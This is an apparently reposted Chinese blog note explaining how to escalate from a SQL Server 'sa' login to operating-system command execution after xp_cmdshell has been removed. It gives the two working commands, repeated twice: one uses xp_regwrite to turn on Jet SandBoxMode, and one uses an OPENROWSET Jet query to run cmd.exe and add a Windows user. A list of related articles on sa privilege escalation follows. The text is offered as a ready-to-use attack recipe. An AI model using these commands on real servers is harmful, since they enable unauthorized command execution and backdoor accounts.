sa下沙盘模式提权(转)
2012-06-04 08:49
141 查看
sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,
也被一些人不断的再次提出来,
为了方便自己记忆再写出来,
在这种情况下,要执行命令,条件是要有xp_regwrite。
首先开启沙盘模式:
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Jet\4.0\Engines’,'SandBoxMode’,'REG_DWORD’,1
然后利用jet.oledb执行系统命令
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\windows\system32\ias\ias.mdb’,'select shell(“cmd.exe /c net user cnfjhh fst /add”)’)
也被一些人不断的再次提出来,
为了方便自己记忆再写出来,
在这种情况下,要执行命令,条件是要有xp_regwrite。
首先开启沙盘模式:
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Jet\4.0\Engines’,'SandBoxMode’,'REG_DWORD’,1
然后利用jet.oledb执行系统命令
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\windows\system32\ias\ias.mdb’,'select shell(“cmd.exe /c net user cnfjhh fst /add”)’)
相关文章推荐
- SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
- zz SQL Server2005以windows 身份验证模式安装后,如何改为混合模式以及sa密码设定
- SQL-Server2005 sa用户设置,身份验证模式修改
- 误删除系统帐户且SA被禁用,如何修复?单用户模式登录可解决。
- 修改SQL Server 2005 express为混合认证模式 (sa帐号无法登陆的解决)
- 如何修改SQL Server 2000身份验证模式和系统管理员Sa的登录密码
- SA权限的入侵及小议SA提权
- Sql server 单用户模式 添加Windows用户验证,修改SA账户信息
- MSSQL SA错误提权集锦
- sql 2000 数据库SA提权方法
- 得到Sa密码后-MsSql提权命令
- 修改SQL Server 2005 express为混合认证模式 (sa帐号无法登陆的解决)
- 一次SA权限入侵和小议SA提权
- 更改 MSDE sa 密码和登录验证模式
- 如何修改SQL Server 2000身份验证模式和系统管理员Sa的登录密码
- MSSQL注入SA权限不显错模式下的入侵
- 如何修改SQL Server 2000身份验证模式和系统管理员Sa的登录密码
- sa提权技巧之xp_regwrite替换sethc.exe
- 如何修改SQL Server 2000身份验证模式和系统管理员Sa的登录密码